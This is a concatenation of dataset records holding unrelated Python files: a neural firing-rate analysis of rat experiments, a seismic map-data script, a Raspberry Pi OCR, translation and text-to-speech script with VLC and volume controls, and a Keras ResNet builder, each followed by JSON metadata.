-------------------------------------------------\n# \ndate_folder = 8\n\ndata_folder = join(const.base_save_folder, const.rat_folder, const.date_folders[date_folder], 'Data')\n\nkilosort_folder = join(const.base_save_folder, const.rat_folder, const.date_folders[date_folder], 'Analysis',\n 'Kilosort')\n\nevents_folder = join(data_folder, \"events\")\n\nanalysis_folder = join(const.base_save_folder, const.rat_folder, const.date_folders[date_folder], 'Analysis')\nresults_folder = join(analysis_folder, 'Results')\npoke_folder = join(results_folder, 'EventsCorrelations', 'Poke')\n\nevent_dataframes = ns_funcs.load_events_dataframes(events_folder, sync_funcs.event_types)\nfile_to_save_to = join(kilosort_folder, 'firing_rate_with_video_frame_window.npy')\ntemplate_info = pd.read_pickle(join(kilosort_folder, 'template_info.df'))\n\nspike_info = pd.read_pickle(join(kilosort_folder, 'spike_info_after_cleaning.df'))\n\nvideo_frame_spike_rates_filename = join(kilosort_folder, 'firing_rate_with_video_frame_window.npy')\nspike_rates = np.load(video_frame_spike_rates_filename)\n\nraw_data_filename = join(data_folder, 'Amplifier_APs.bin')\nraw_data = ns_funcs.load_binary_amplifier_data(raw_data_filename,\n number_of_channels=const.NUMBER_OF_AP_CHANNELS_IN_BINARY_FILE)\n\n# \n# -------------------------------------------------\n# \n\ncamera_pulses, beam_breaks, sounds = \\\n sync_funcs.get_time_points_of_events_in_sync_file(data_folder, clean=True,\n cam_ttl_pulse_period=\n const.CAMERA_TTL_PULSES_TIMEPOINT_PERIOD)\nsounds_dur = sounds[:, 1] - sounds[:, 0]\nreward_sounds = sounds[sounds_dur < 4000]\n\n# Using the trialend csv file to generate events\n# succesful_trials = event_dataframes['ev_trial_end'][event_dataframes['ev_trial_end']['Result'] == 'Food']\n# succesful_trials = succesful_trials['AmpTimePoints'].values\n\n# Using the start of the reward tone to generate events\n# There is a difference of 78.6 frames (+-2) between the reward tone and the csv file event (about 700ms)\nsuccesful_trials = reward_sounds[:, 0]\n\n# Get the average firing rates of all neurons a few seconds around the successful pokes\ntime_around_beam_break = 8\navg_firing_rate_around_suc_trials = fr_funcs.get_avg_firing_rates_around_events(spike_rates=spike_rates,\n event_time_points=succesful_trials,\n ev_video_df=event_dataframes['ev_video'],\n time_around_event=time_around_beam_break)\n# \n\n\n# -------------------------------------------------\n# \n# Find which neurons increase their firing rate on average around a successful poke\nincreasing_firing_rates_neuron_index, increasing_firing_rates = \\\n fr_funcs.get_neurons_following_pattern_around_an_event(avg_firing_rate_around_event=avg_firing_rate_around_suc_trials,\n time_around_pattern=time_around_beam_break,\n pattern_regions_to_compare=[0, 0.8, 1.0, 1.2],\n comparison_factor=4, comparison_direction='increase',\n baserate=0.1)\n\nfr_funcs.show_firing_rates_around_event(increasing_firing_rates)\n\n# Show where the neurons are in the brain\ntemplate_info_increasing_fr_neurons = template_info.iloc[increasing_firing_rates_neuron_index]\nspp.view_grouped_templates_positions(kilosort_folder, const.BRAIN_REGIONS, const.PROBE_DIMENSIONS,\n const.POSITION_MULT, template_info=template_info_increasing_fr_neurons)\n\npd.to_pickle(template_info_increasing_fr_neurons, join(poke_folder, 'ti_increasing_neurons_on_trial_pokes.df'))\n\n# Have a detailed look at the neuron with the largest increase\n# largest_increase_neuron_index = increasing_firing_rates_neuron_index[np.argmax(increasing_firing_rates_ratio)]\ntime_around_beam_break = 8\nindex = 0\nfig1 = plt.figure(1)\nfig2 = plt.figure(2)\noutput = None\nframes_around_beam_break = 120 * time_around_beam_break\ntime_points_around_beam_break = const.SAMPLING_FREQUENCY * time_around_beam_break\nargs = [increasing_firing_rates_neuron_index, avg_firing_rate_around_suc_trials, template_info, spike_info,\n succesful_trials, frames_around_beam_break, fig1, fig2]\n\nshow_rasters_increase = fr_funcs.show_rasters_for_live_update\n\nsl.connect_repl_var(globals(), 'index', 'output', 'show_rasters_increase', 'args',\n slider_limits=[0, len(increasing_firing_rates_neuron_index) - 1])\n\n# \n\n\n# -------------------------------------------------\n# \n# Find which neurons decrease their firing rate on average around a successful poke\ndecreasing_firing_rates_neuron_index, decreasing_firing_rates = \\\n fr_funcs.get_neurons_following_pattern_around_an_event(avg_firing_rate_around_event=avg_firing_rate_around_suc_trials,\n time_around_pattern=time_around_beam_break,\n pattern_regions_to_compare=[0, 0.8, 1.0, 1.2],\n comparison_factor=4, comparison_direction='decrease',\n baserate=0.1)\n\nfr_funcs.show_firing_rates_around_event(decreasing_firing_rates)\n\n# Show where the neurons are in the brain\ntemplate_info_decreasing_fr_neurons = template_info.iloc[decreasing_firing_rates_neuron_index]\nspp.view_grouped_templates_positions(kilosort_folder, const.BRAIN_REGIONS, const.PROBE_DIMENSIONS,\n const.POSITION_MULT, template_info=template_info_decreasing_fr_neurons)\n\npd.to_pickle(template_info_decreasing_fr_neurons, join(poke_folder, 'ti_decreasing_neurons_on_trial_pokes.df'))\n\n# Have a look at the neuron with the largest decrease\ntime_around_beam_break = 8\nindex = 0\nfig1 = plt.figure(1)\nfig2 = plt.figure(2)\noutput = None\nframes_around_beam_break = 120 *time_around_beam_break\nargs = [decreasing_firing_rates_neuron_index, avg_firing_rate_around_suc_trials, template_info, spike_info,\n succesful_trials, frames_around_beam_break, fig1, fig2]\n\nshow_rasters_decrease = fr_funcs.show_rasters_for_live_update\n\nsl.connect_repl_var(globals(), 'index', 'output', 'show_rasters_decrease', 'args',\n slider_limits=[0, len(decreasing_firing_rates_neuron_index) - 1])\n\n# \n\n\n# -------------------------------------------------\n# \nplt.plot(cdt.space_data(avg_firing_rate_around_suc_trials, 10).transpose())\n\ntouch_ball_trials = event_dataframes['ev_rat_touch_ball']\n\nframes_of_touch_ball_trials = sync_funcs.time_point_to_frame_from_video_df(event_dataframes['ev_video'],\n touch_ball_trials['AmpTimePoints'].values)\n\nfiring_rate_around_touch_trials = np.zeros((len(touch_ball_trials), len(spike_rates), 2 * frames_around_beam_break))\n\nfor f in np.arange(len(firing_rate_around_touch_trials)):\n frame = frames_of_touch_ball_trials[f]\n firing_rate_around_touch_trials[f, :, :] = spike_rates[:, frame - frames_around_beam_break:\n frame + frames_around_beam_break]\n\navg_firing_rate_around_touch_trials = firing_rate_around_touch_trials.mean(axis=0)\navg_firing_rate_around_touch_trials -= np.expand_dims(avg_firing_rate_around_touch_trials[:, :600].mean(axis=1), axis=1)\nplt.imshow(avg_firing_rate_around_touch_trials, vmax=avg_firing_rate_around_touch_trials.max(), vmin=0)\n\n# \n\n\n# -------------------------------------------------\n# \n\nall_pic_folder = join(results_folder, 'Images', 'Modulating_Neurons_On_Events', 'All_neurons')\nfig = plt.figure(0, figsize=(8, 6), dpi=150)\ntime_around_beam_break = 8\nframes_around_beam_break = 120 * time_around_beam_break\n\ndec_and_inc_neurons_indices = np.union1d(decreasing_firing_rates_neuron_index, increasing_firing_rates_neuron_index)\n\ny_positions = template_info['position Y'].values\nposition_sorted_indices = np.argsort(y_positions)\nfor index in position_sorted_indices:\n fig = fr_funcs.show_rasters(index, template_info, spike_info,\n succesful_trials, frames_around_beam_break, fig)\n template_number = template_info.iloc[index]['template number']\n firing_rate = \"%3.3f\" % template_info.iloc[index]['firing rate']\n y_position = int(template_info.iloc[index]['position Y'] * const.POSITION_MULT)\n in_group = 0\n if index in dec_and_inc_neurons_indices:\n in_group = 1\n plt.title('Template number = {}, Height on probe = {}, Firing rate = {} Hz, In group = {}'.format(str(template_number),\n str(y_position),\n firing_rate,\n str(in_group)))\n plt.savefig(join(all_pic_folder, 'height_{}_template_{}_index_{}.png'.format(str(y_position), str(template_number),\n str(index))))\n\n# \n\n\n# -------------------------------------------------\n# \n\ntime_around_beam_break = 0.1\ntimepoints_around_beam_break = int(const.SAMPLING_FREQUENCY * time_around_beam_break)\n\nvoltage_around_trials = np.empty((len(succesful_trials), const.NUMBER_OF_AP_CHANNELS_IN_BINARY_FILE,\n 2 * timepoints_around_beam_break))\nfor st in np.arange(len(succesful_trials)):\n voltage_around_trials[st, :, :] = raw_data[:, succesful_trials[st] - timepoints_around_beam_break:\n succesful_trials[st] + timepoints_around_beam_break]\n\navg_voltage_around_trials = np.mean(voltage_around_trials, axis=0)\n\n_ = plt.imshow(np.flipud(avg_voltage_around_trials), aspect='auto')\n# \n\n\n# -------------------------------------------------\n# \n\nsmooth_time = 0.5\nsmooth_frames = smooth_time * 120\n\nt = binning.rolling_window_with_step(avg_firing_rate_around_suc_trials, np.mean, smooth_frames, int(smooth_frames / 3))\ntn = preproc.normalize(t, norm='l1', axis=0)\n\ntn = np.asarray(t)\nfor i in np.arange(len(t)):\n tn[i, :] = binning.scale(t[i], 0, 1)\n\ny_positions = template_info['position Y'].values\nposition_sorted_indices = np.argsort(y_positions)\n\nregions_pos = list(const.BRAIN_REGIONS.values())\nregion_lines = []\nfor rp in regions_pos:\n region_lines.append(sync_funcs.find_nearest(y_positions[position_sorted_indices] * const.POSITION_MULT, rp)[0])\nregion_lines = np.array(region_lines)\n\ntns = tn[position_sorted_indices]\n\nplt.imshow(np.flipud(tns), aspect='auto')\nplt.hlines(y=len(t) - region_lines, xmin=0, xmax=len(tns[0])-1, linewidth=3, color='w')\nplt.vlines(x=int(len(tns[0]) / 2), ymin=0, ymax=len(tns) - 1)\n\n\nplt.imshow(np.flipud(tns), aspect='auto', extent=[-8, 8, len(tns), 0])\nplt.hlines(y=len(t) - region_lines, xmin=-8, xmax=8, linewidth=2, color='w')\nplt.vlines(x=0, ymin=0, ymax=len(tns) - 1)\n\n\ni = 0\nsv.graph_pane(globals(), 'i', 'tn')\n\n\ntime_around_beam_break = 8\nindex = 0\nfig1 = plt.figure(1)\nfig2 = plt.figure(2)\noutput = None\nall_indices = np.arange(len(avg_firing_rate_around_suc_trials))\nframes_around_beam_break = 120 *time_around_beam_break\nargs = [all_indices, avg_firing_rate_around_suc_trials, template_info, spike_info,\n succesful_trials, frames_around_beam_break, fig1, fig2]\n\nshow_rasters_decrease = fr_funcs.show_rasters_for_live_update\n\nsl.connect_repl_var(globals(), 'index', 'output', 'show_rasters_decrease', 'args',\n slider_limits=[0, len(avg_firing_rate_around_suc_trials) - 1])\n# \n\n# -------------------------------------------------\n# \n\nfr_norm_sorted = tns\n\ncov = np.cov(fr_norm_sorted)\n\n\n# MUTUAL INFO BETWEEN RATES\nn = 0\nmutual_infos = []\nfor rate1 in fr_norm_sorted:\n for rate2 in fr_norm_sorted:\n mutual_infos.append(MI.mi_LNC([rate1.tolist(), rate2.tolist()],\n k=10, base=np.exp(1), alpha=0.4, intens=1e-10))\n n += 1\n print('Done neuron {}'.format(str(n)))\n\n\nmutual_infos = np.reshape(np.array(mutual_infos), (fr_norm_sorted.shape[0], fr_norm_sorted.shape[0]))\nnp.save(join(analysis_folder, 'Results', 'MutualInformation',\n 'mutual_infos_NSprobe_spike_rates_vs_spike_rates_all_neurons_around_succ_trials.npy'), mutual_infos)\n\n# \n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n\ntime_around_beam_break = 8\nfiring_rate_around_suc_trials, _ = fr_funcs.get_avg_firing_rates_around_events(spike_rates=spike_rates,\n event_time_points=succesful_trials,\n ev_video_df=event_dataframes['ev_video'],\n time_around_event=time_around_beam_break,\n keep_trials=True)\n\nevents_random = np.random.choice(np.arange(succesful_trials.min(), succesful_trials.max(), 100),\n len(succesful_trials), replace=False)\nfiring_rate_around_random_times, _ = fr_funcs.get_avg_firing_rates_around_events(spike_rates=spike_rates,\n event_time_points=events_random,\n ev_video_df=event_dataframes['ev_video'],\n time_around_event=time_around_beam_break,\n keep_trials=True)\n\ny_positions = template_info['position Y'].values\nposition_sorted_indices = np.argsort(y_positions)\n\nregions_pos = list(const.BRAIN_REGIONS.values())\nregion_lines = []\nfor rp in regions_pos:\n region_lines.append(sync_funcs.find_nearest(y_positions[position_sorted_indices] * const.POSITION_MULT, rp)[0])\nregion_lines = np.array(region_lines)\n\nsmooth_time = 0.5\nsmooth_frames = smooth_time * 120\n\nt = binning.rolling_window_with_step(firing_rate_around_suc_trials[0, :, :], np.mean, smooth_frames,\n int(smooth_frames / 3))\n\n\ntrials = firing_rate_around_suc_trials.shape[0]\nneurons = firing_rate_around_suc_trials.shape[1]\ntimebins = t.shape[1]\ntimebined = np.empty((trials, neurons, timebins))\ntimebined_sorted_frs_around_suc_trials = np.empty((trials, neurons, timebins))\ntimebined_sorted_frs_around_random = np.empty((trials, neurons, timebins))\ntimebined_sorted_normalised_frs_around_suc_trials = np.empty((trials, neurons, timebins))\ntimebined_sorted_normalised_frs_around_random = np.empty((trials, neurons, timebins))\n\nfor trial in np.arange(trials):\n timebined[trial, :, :] = binning.rolling_window_with_step(firing_rate_around_suc_trials[trial, :, :], np.mean,\n smooth_frames, int(smooth_frames / 3))\n\n timebined_sorted = timebined[trial, position_sorted_indices, :]\n\n timebined_sorted_frs_around_suc_trials[trial, :, :] = timebined_sorted\n\n for neuron in np.arange(neurons):\n timebined_sorted_normalised_frs_around_suc_trials[trial, neuron, :] = \\\n binning.scale(timebined_sorted_frs_around_suc_trials[trial, neuron, :], 0, 1)\n\n timebined[trial, :, :] = binning.rolling_window_with_step(firing_rate_around_random_times[trial, :, :], np.mean,\n smooth_frames, int(smooth_frames / 3))\n\n timebined_sorted = timebined[trial, position_sorted_indices, :]\n\n timebined_sorted_frs_around_random[trial, :, :] = timebined_sorted\n\n for neuron in np.arange(neurons):\n timebined_sorted_normalised_frs_around_random[trial, neuron, :] = \\\n binning.scale(timebined_sorted_frs_around_random[trial, neuron, :], 0, 1)\n\navg_timebined_sorted_frs_around_suc_trials = np.mean(timebined_sorted_frs_around_suc_trials, axis=0)\navg_timebined_sorted_frs_around_random = np.mean(timebined_sorted_frs_around_random, axis=0)\n\navg_timebined_sorted_normalised_frs_around_suc_trials = np.empty((neurons, timebins))\nfor neuron in np.arange(neurons):\n avg_timebined_sorted_normalised_frs_around_suc_trials[neuron, :] = \\\n binning.scale(avg_timebined_sorted_frs_around_suc_trials[neuron, :], 0, 1)\n\navg_timebined_sorted_normalised_frs_around_random = np.empty((neurons, timebins))\nfor neuron in np.arange(neurons):\n avg_timebined_sorted_normalised_frs_around_random[neuron, :] = \\\n binning.scale(avg_timebined_sorted_frs_around_random[neuron, :], 0, 1)\n\n\n# Normalising the average is not the same as averaging the normalised trials!\n# The following scales individual trials so when they get averaged the result is going to be normalised\ntimebined_sorted_special_normalised_frs_around_suc_trials = np.empty((trials, neurons, timebins))\ntimebined_sorted_special_normalised_frs_around_random = np.empty((trials, neurons, timebins))\n\nfor neuron in np.arange(neurons):\n\n X_max_suc = np.mean(timebined_sorted_frs_around_suc_trials, axis=0)[neuron].max()\n X_min_suc = np.mean(timebined_sorted_frs_around_suc_trials, axis=0)[neuron].min()\n\n X_max_rand = np.mean(timebined_sorted_frs_around_random, axis=0)[neuron].max()\n X_min_rand = np.mean(timebined_sorted_frs_around_random, axis=0)[neuron].min()\n\n for trial in np.arange(trials):\n\n timebined_sorted_special_normalised_frs_around_suc_trials[trial, neuron] = \\\n binning.scale(timebined_sorted_frs_around_suc_trials[trial, neuron, :], 0, 1, X_min_suc, X_max_suc)\n\n timebined_sorted_special_normalised_frs_around_random[trial, neuron] = \\\n binning.scale(timebined_sorted_frs_around_random[trial, neuron, :], 0, 1, X_min_rand, X_max_rand)\n\nplt.figure(0)\nplt.imshow(np.flipud(np.mean(timebined_sorted_special_normalised_frs_around_suc_trials, axis=0)), aspect='auto')\nplt.hlines(y=neurons - region_lines, xmin=0, xmax=timebins-1, linewidth=3, color='w')\nplt.vlines(x=int(timebins / 2), ymin=0, ymax=neurons - 1)\n\ntimebined_sorted_frs_around_suc_trials_tr = np.transpose(timebined_sorted_frs_around_suc_trials, [1, 2, 0])\ntimebined_sorted_frs_around_random_tr = np.transpose(timebined_sorted_frs_around_random, [1, 2, 0])\np_values_pokes_vs_random, cluster_labels_poke_vs_random = \\\n cl_per.monte_carlo_significance_probability(timebined_sorted_frs_around_suc_trials_tr, timebined_sorted_frs_around_random_tr,\n num_permutations=1000, min_area=8, cluster_alpha=0.05,\n monte_carlo_alpha=0.05, sample_statistic='independent',\n cluster_statistic='maxsum')\n\ndata = avg_timebined_sorted_normalised_frs_around_suc_trials\ncluster_labels = cluster_labels_poke_vs_random\nplf.show_significant_clusters_on_data(data, cluster_labels, region_lines, np.arange(neurons), window_time=8,\n colormap='binary', markers='o', alpha=0.6)\n\n\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n","sub_path":"ExperimentSpecificCode/_2018_Chronic_Neuroseeker_TouchingLight/_2019_06_25_AK_47p2/Correlations/Time_locked_to_events/firing_rates_time_locked_on_succesful_trials.py","file_name":"firing_rates_time_locked_on_succesful_trials.py","file_ext":"py","file_size_in_byte":21509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"534935297","text":"#!/usr/bin/env python\n\"\"\"\nMap plot\n\"\"\"\nimport os, json\nimport numpy as np\nimport pyproj\nfrom obspy.imaging import beachball\nimport cst\n\n# parameters\npath = os.path.join('run', 'map-data') + os.sep\nos.mkdir(path)\neventid = 14383980\nbounds = [[-80000.0, 48000.0], [-58000.0, 54000.0]]\nmts = os.path.join('run', 'data', '%s.mts.json' % eventid)\nmts = json.load(open(mts))\norigin = mts['longitude'], mts['latitude'], mts['depth']\nproj = pyproj.Proj(proj='tmerc', lon_0=origin[0], lat_0=origin[1])\n\n# extent\nx, y = bounds\nx = [x[0], x[1], x[1], x[0]]\ny = [y[0], y[0], y[1], y[1]]\nx, y = np.array(proj(x, y, inverse=True))\nextent = [[x.min(), x.max()], [y.min(), y.max()]]\n\n# source\nm = mts['double_couple_clvd']\nm = m['mzz'], m['mxx'], m['myy'], m['mxz'], -m['myz'], -m['mxy']\nb = beachball.Beach(m, width=200)\np = []\nfor c in b.get_paths():\n p += c.to_polygons() + [[[float('nan'), float('nan')]]]\ndel p[-1]\nb = np.concatenate(p) * 0.005\nf = path + 'Beachball.npy'\nnp.save(f, b.astype('f').T)\n\n# coastlines and boarders\nx, y = cst.data.mapdata('coastlines', 'high', extent, 10.0)\nx -= 360.0\nf = path + 'Coastlines.npy'\nnp.save(f, np.array([x, y], 'f'))\n\n# topography\nxx, yy, zz = cst.data.dem(extent, mesh=True)\nx, y = cst.plt.contour(xx, yy, zz, [1000])[0]\nf = path + 'Mountains.npy'\nnp.save(f, np.array([x, y], 'f'))\n\n# surface\nzz.fill(0.0)\nfor cvm, vv in [\n ['cvmg', cst.cvmh.extract(xx, yy, zz, 'vs')],\n ['cvmh', cst.cvmh.extract(xx, yy, zz, 'vs', vs30=None)],\n ['cvms', cst.cvms.extract(xx, yy, zz, 'vs')],\n]:\n f = path + 'Surface-Vs-%s.npy' % cvm\n np.save(f, vv[0].astype('f'))\n\n# cvm basins\nzz.fill(1000.0)\nfor cvm, vv in [\n ('cvmh', cst.cvmh.extract(xx, yy, zz, 'vs', vs30=None)),\n ('cvms', cst.cvms.extract(xx, yy, zz, 'vs')),\n]:\n v = 2500,\n x, y = cst.plt.contour(xx, yy, vv[0], v)[0]\n f = path + 'Basins-%s.npy' % cvm.upper()\n np.save(f, np.array([x, y], 'f'))\n\n","sub_path":"scripts/Chino-Hills/map-data.py","file_name":"map-data.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"253533032","text":"\"\"\"!\n@file CV_algo.py\n\n@brief\nThis is the code used during the entire processing of the CV algorithm. This is the main section of code that handles all image, translation, and audio processing for the device.\n\"\"\"\n\n## @package convert_to_speech\n# This package is used for speech translation module through gTTS.\nimport convert_to_speech \n\n## @package cv2\n# This package is used for all image handling and image processing.\nimport cv2 \n\n## @package pytesseract\n# This package is used for the optical character recognition to retrieve text from a picture.\nimport pytesseract \n\n## @package subprocess \n# subprocess package to be used to call another process as a thread.\nimport subprocess \n\n## @package time\n#This packaged is mostly used for button debouncing.\nimport time \n\n## @package googletrans\n# This package is ued for the translation functionality of the processing.\nfrom googletrans import Translator \n\n## @package led\n# This is the led.py script located within Software that was used for testing.\n#import led \n\n## @package pygame\n# This package is used to output audio cues for the user.\nimport pygame \n\n\n#------------------------------GLOBAL VARIABLES------------------------------------------------#\n#USES GOOGLE TRANSLATE LANGUAGE CODES NOT TESSERACT LANGUAGE CODES\n#Cycles through 3 languages: english, hindi, telegu\n#To add more languages: add the appropriate code and change value of land_options variable accordingly\n\n## This is the languages array that is used for language translation and selection\nlanguages = ['en', 'hi', 'te']\n\n#--------------------------INTERRUPT ROUTINES AND OTHER FUNCTIONS------------------------------#\n#Function to play audio cues for button presses:\ndef playCue(fn):\n \"\"\"!\n Function to play audio cues for button presses\n\n @param fn This is the soundbite that is loaded in and is ready to be used as an audio cue\n\n @return Technically no return in the function but an audio cue is output to the user\n \"\"\"\n pygame.mixer.init()\n pygame.mixer.music.load(fn)\n pygame.mixer.music.play()\n \n#Interrupt Routine TO PAUSE/PLAY THE VLC player\ndef PlayPause(channel):\n \"\"\"!\n Function to pause audio on button press\n\n @param channel Current audio channel that is being used.\n\n @return Technically no return in the function but the current output audio will be paused\n \"\"\"\n subprocess.run('dbus-send --type=method_call --dest=org.mpris.MediaPlayer2.vlc /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.PlayPause', shell = True)\n print('PAUSE BUTTON PRESSED')\n time.sleep(1) #For debouncing \n\n#Interrupt Routine TO STOP THE VLC player output\ndef StopPlayback(channel): \n \"\"\"!\n Function to stop all audio on button press\n\n @param channel Current audio channel that is being used.\n\n @return Technically no return in the function but the current output audio will be stopped.\n \"\"\" \n #EndOutput will direct to the first program\n EndOutput()\n print('STOP BUTTON PRESSED')\n time.sleep(1) #For debouncing\n\n#Interrupt Routine to increase the volume using amixer\ndef VolumeUp(channel):\n \"\"\"!\n Function to increase volume on button press\n\n @param channel Current audio channel that is being used.\n\n @return Technically no return in the function but the current volume will be increased.\n \"\"\"\n print('Volume increased')\n subprocess.run('amixer set Master 10%+',shell = True)\n #subprocess.run('amixer -D pulse sset Master 10%+',shell = True)\n time.sleep(1) #For debouncing\n \n#Interrupt Routine to decrease the volume using amixer \ndef VolumeDown(channel):\n \"\"\"!\n Function to decrease volume on button press\n\n @param channel Current audio channel that is being used.\n\n @return Technically no return in the function but the current volume will be decreased\n \"\"\"\n print('Volume decreased')\n subprocess.run('amixer set Master 10%-',shell = True)\n #subprocess.run('amixer -D pulse sset Master 10%-',shell = True)\n time.sleep(1) #For debouncing\n\n#Function to check if VLC process is running: (Used in Spd_Change and EndOutput functions)\ndef CheckforVLC():\n \"\"\"!\n Function to check if VLC process is running: (Used in Spd_Change and EndOutput functions) \n \"\"\"\n out = \"\"\n try:\n out = subprocess.check_output([\"pidof\",\"vlc\"])\n except:\n pass\n if out != \"\" :\n return True\n else:\n playCue('/home/pi/SoundBites/No_VLC.mp3')\n return False\n \n#function to change speed output:\ndef SpeedChange(x):\n \"\"\"!\n Function to change speed on button press\n\n @param x Current speed setting that needs the audio to be set to \n\n @return Technically no return in the function but the current audio output will have its speed changed\n \"\"\"\n subprocess.run('dbus-send --print-reply --session --dest=org.mpris.MediaPlayer2.vlc /org/mpris/MediaPlayer2 org.freedesktop.DBus.Properties.Set string:org.mpris.MediaPlayer2.Player string:Rate variant:double:%f' % x, shell = True)\n time.sleep(0.5)\n \n#function to end output:\ndef EndOutput():\n \"\"\"!\n Function to end all VLC output.\n \"\"\"\n if (CheckforVLC()):\n subprocess.run('killall vlc', shell = True)\n playCue('/home/pi/SoundBites/Stopped.mp3')\n else:\n print(\"No VLC Stopped.\")\n \n#MAIN Computer Vision algorithm----------------------------------------------->\ndef CV(l):\n \"\"\"!\n Function that serves as the main CV algorithm as well as the picture-to-audio processing.\n\n @param l Current language index setting that needs to be used for the languages array.\n\n @return Technically no return in the function but the requested input picture will have its audio output to the user in the correct translation.\n \"\"\"\n\n ##l is the language index and is set in the main program and passed into CV\n lang_index=l \n #led.blink() #!Debug Line\n\n #pytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe' #!FOR TESTING SHOULD BE UNNECESSARY WITH LINUX\n\n #----------------------------------------------------------------Read in image----------------------------------------------------------------\n ##This is the current image that was captured from camera.py\n img = cv2.imread('/home/pi/Pictures/input.png')\n #img = cv2.imread('skew.jpg') #!FOR TESTING\n\n #-----------------------------------------------------Perform preprocessing of the image------------------------------------------------------\n\n #Grayscale conversion\n grayscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n #Gaussian blur conversion\n gaussian = cv2.GaussianBlur(grayscale, (1,1), 0)\n\n #Threshold conversion\n ret, threshold = cv2.threshold(grayscale,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n #!FOR TESTING\n #cv2.imshow('test.png',rotated)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n\n #---------------------------------------------------------Convert the image to text---------------------------------------------------------\n custom_config = r'--oem 3 --psm 6'\n text = pytesseract.image_to_string(img, lang=\"eng+hin+tel\", config=custom_config) #TODO: Need to fix the language part\n \n #!FOR TESTING\n #led.blink()\n #led.blink()\n #print(text) \n \n ##This is the translator object to be used for translation.\n translator = Translator()\n\n ##This is the translation generated from the translate function from googletrans\n translation = translator.translate(text, dest=languages[lang_index])\n\n #!FOR TESTING\n print(translation.text)\n\n #---------------------------------------------------------Convert the text to an mp3--------------------------------------------------------\n convert_to_speech.txt_to_mp3(translation.text, languages[lang_index]) #use the convert_to_speech.py to achieve mp3 file\n\n #-------------------------------------------------------------Play the audio----------------------------------------------------------------\n subprocess.run('killall vlc', shell = True) #first terminate all vlc outputs\n subprocess.run('cvlc /home/pi/Pictures/speech_output.mp3 --play-and-exit', shell = True) #PLAY IN VLC","sub_path":"Software/CV_algo.py","file_name":"CV_algo.py","file_ext":"py","file_size_in_byte":8359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"304792699","text":"import re\nfrom tensorflow.python.keras import Sequential\nfrom tensorflow.python.keras.layers import GlobalAveragePooling2D, Dense, Conv2D\n\nfrom layers import ConvBNRelu, ConvBNReluResidualBlock, ConvBNReluBlock\n\n\ndef make_resnet(net):\n match = re.match(r'([a-z]*)(\\d+)', net)\n net_type, n_layers = match.group(1), match.group(2)\n residual = (net_type == 'resnet')\n n = (int(n_layers) - 2) // 6\n print(\"Net: detected n = {} {} shortcuts\".format(n, 'with' if residual else 'without'))\n\n Block = ConvBNReluResidualBlock if residual else ConvBNReluBlock\n _layers = [\n ConvBNRelu(strides=1, filters=16, input_shape=(32, 32, 3)),\n\n Block(strides=1, filters=16),\n [Block(strides=1, filters=16) for _ in range(n - 1)],\n\n Block(strides=2, filters=32),\n [Block(strides=1, filters=32) for _ in range(n - 1)],\n\n Block(strides=2, filters=64),\n [Block(strides=1, filters=64) for _ in range(n - 1)],\n\n GlobalAveragePooling2D(),\n Dense(10, 'softmax')\n ]\n\n layers = []\n for x in _layers:\n try:\n for l in x:\n layers.append(l)\n except TypeError:\n layers.append(x)\n\n model = Sequential(layers)\n model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc'])\n return model\n","sub_path":"runs/_sources/resnet_67ecce94d2a0ad7d429f9ba404e9b28b.py","file_name":"resnet_67ecce94d2a0ad7d429f9ba404e9b28b.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"264335028","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 3 08:50:59 2018\n\n@author: Ruth\n\"\"\"\n\n\nimport csv\n\n\n\nruns=[]\n\nrow_num= 2\nwith open(\"cr1.tsv\") as csvfile:\n reader = csv.DictReader(csvfile, delimiter='\\t')\n for row in reader:\n print(row)\n print(len(row))\n args= list(row.values())\n print(args)\n \n","sub_path":"Assignment 6- Object-oriented program/Student assignments/RuthMisir_Hw6_BMSE/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"432743096","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 29 12:48:10 2018\r\n\r\n@author: ibras\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n# read train data\r\npath = 'C:/Users/ibras/AnacondaProjects/Kaggle/Titanic/train.csv'\r\ntraindf = pd.read_csv(path)\r\ntraindf.columns = map(str.lower, traindf.columns)\r\n\r\nprint(traindf.describe()) # some values are NaN or 0 where they shouldnt be\r\n# age, cabin and embarked columns have null values, fare is 0 for some\r\n \r\nprint(traindf[['age','fare']][traindf.fare<1]) # check if no fare relates to age\r\n# no fare did not relate to age (as in baby), so most likely a mistake\r\n# apply average fare for the class instead of 0\r\n# first set 0 to nan to calculate means\r\ntraindf.fare = traindf.fare.map(lambda x: np.nan if x==0 else x)\r\n#calculate the mean fare for each class\r\nfare_means = traindf.pivot_table('fare', index='pclass', aggfunc='mean')\r\n\r\n ","sub_path":"titanic1.py","file_name":"titanic1.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"275614662","text":"# 세제곱근을 찾아라\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n ans = -1\n for i in range(10**6+1):\n if i ** 3 == N:\n ans = i\n break\n print('#%d %d' % (tc, ans))","sub_path":"Python/SWEA/Code-Problem/D3/5688.py","file_name":"5688.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"228889004","text":"import matplotlib.pyplot as plt\nimport numpy as np \nimport math\nimport scipy.constants 